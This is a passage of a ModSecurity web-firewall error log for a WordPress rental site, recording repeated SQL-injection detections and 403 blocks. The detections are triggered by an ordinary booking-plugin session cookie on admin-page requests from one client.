"agIEVg-Qm4vhlWBPlMjlzAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:18.190412 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEVg-Qm4vhlWBPlMjlzAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:18.850521 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEVg-Qm4vhlWBPlMjlzAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:18.960497 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEVg-Qm4vhlWBPlMjlzgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:18.960815 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEVg-Qm4vhlWBPlMjlzgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:19.622565 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEVg-Qm4vhlWBPlMjlzgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:19.731713 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEVw-Qm4vhlWBPlMjlzwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:19.732014 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEVw-Qm4vhlWBPlMjlzwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:20.117382 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEVw-Qm4vhlWBPlMjlzwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:20.406486 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEWA-Qm4vhlWBPlMjl0QAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:20.406772 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEWA-Qm4vhlWBPlMjl0QAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:21.066907 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEWA-Qm4vhlWBPlMjl0QAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:21.328836 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEWQ-Qm4vhlWBPlMjl0wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:21.329102 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEWQ-Qm4vhlWBPlMjl0wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:22.010110 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEWQ-Qm4vhlWBPlMjl0wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:22.249437 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEWg-Qm4vhlWBPlMjl1AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:22.249728 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEWg-Qm4vhlWBPlMjl1AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:22.921496 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEWg-Qm4vhlWBPlMjl1AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:23.338206 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEWw-Qm4vhlWBPlMjl3AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:23.338496 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEWw-Qm4vhlWBPlMjl3AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:25.000204 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEWw-Qm4vhlWBPlMjl3AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:25.094929 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEXQ-Qm4vhlWBPlMjl4QAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:25.095239 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEXQ-Qm4vhlWBPlMjl4QAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:25.697273 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEXQ-Qm4vhlWBPlMjl4QAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:26.000326 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEXQ-Qm4vhlWBPlMjl4wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:26.000617 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEXQ-Qm4vhlWBPlMjl4wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:26.390717 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEXQ-Qm4vhlWBPlMjl4wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:26.640062 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEXg-Qm4vhlWBPlMjl5AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:26.640375 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEXg-Qm4vhlWBPlMjl5AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:27.272340 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEXg-Qm4vhlWBPlMjl5AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:28.029252 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEYA-Qm4vhlWBPlMjl5gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:28.029538 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEYA-Qm4vhlWBPlMjl5gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:28.635978 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEYA-Qm4vhlWBPlMjl5gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:28.884846 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEYA-Qm4vhlWBPlMjl6AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:28.885132 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEYA-Qm4vhlWBPlMjl6AAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:29.526623 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEYA-Qm4vhlWBPlMjl6AAAAAM"], referer: https://rentparadise.fr/wp-login.php
